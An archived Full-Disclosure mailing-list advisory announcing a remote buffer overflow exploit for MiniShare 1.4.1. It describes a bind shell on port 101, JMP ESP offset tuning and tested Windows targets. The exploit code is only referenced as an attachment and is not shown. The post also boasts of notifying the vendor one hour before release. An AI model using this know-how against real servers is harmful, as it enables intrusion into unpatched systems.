NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Full-Disclosure> 2004-11

[Full-Disclosure] [Advisory + Exploit] MiniShare, Minimal HTTP Server for Windows, Remote Buffer Overflow Exploit

From: class 101 (class101phreaker.net)
Date: Sun Nov 07 2004 - 09:41:21 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi List,

I found yesterday this bug in the last version of MiniShare.
This is a simple buffer overflow in the address link.
Vendors are contacted at http://minishare.sourceforge.net
1 hour only before the public advisorie.

Actually no fix are available. The exploit is available in attachment for the list peoples, and available at dfind.kd-team.com my homepage.

class101

MiniShare <= 1.4.1, Remote Buffer Overflow Exploit v0.1.
Bind a shellcode to the port 101.

Full disclosure and exploit
by class101 [at] DFind.kd-team.com [&] #n3ws [at] EFnet
07 november 2004

Thanx to HDMoore and Metasploit.com for their kickass ASM work.

------------------
WHAT IS MINISHARE
------------------

Homepage - http://minishare.sourceforge.net/

MiniShare is meant to serve anyone who has the need to share files to anyone,
doesn't have a place to store the files on the web,
and does not want or simply does not have the skill
and possibility to set up and maintain a complete HTTP-server software...

--------------
VULNERABILITY
--------------

A simple buffer overflow in the link length, nothing more
read the code for further instructions.

----
FIX
----

Actually none, the vendor is contacted the same day published, 1 hour before you.
As a nice fuck to NGSS , iDEFENSE and all others private disclosures
homo crew ainsi que K-OTiK, ki se tap' des keu dans leur "Lab"
lol :->

----
EXTRA
----

Update the JMP ESP if you need. A wrong offset will crash minishare.
Code tested working on MiniShare 1.4.1 and WinXP SP1 English, Win2k SP4 English, WinNT SP6 English
Others MiniShare's versions aren't tested.
Tip: If it crashes for you , try to play with Sleep()...

----
BY
----

    class101 [at] DFind.kd-team.com [&] #n3ws [at] EFnet
       who
      greets
    DiabloHorn [at] www.kd-team.com [&] #kd-team [at] EFnet

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

application/octet-stream attachment: 101_mini.cpp

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]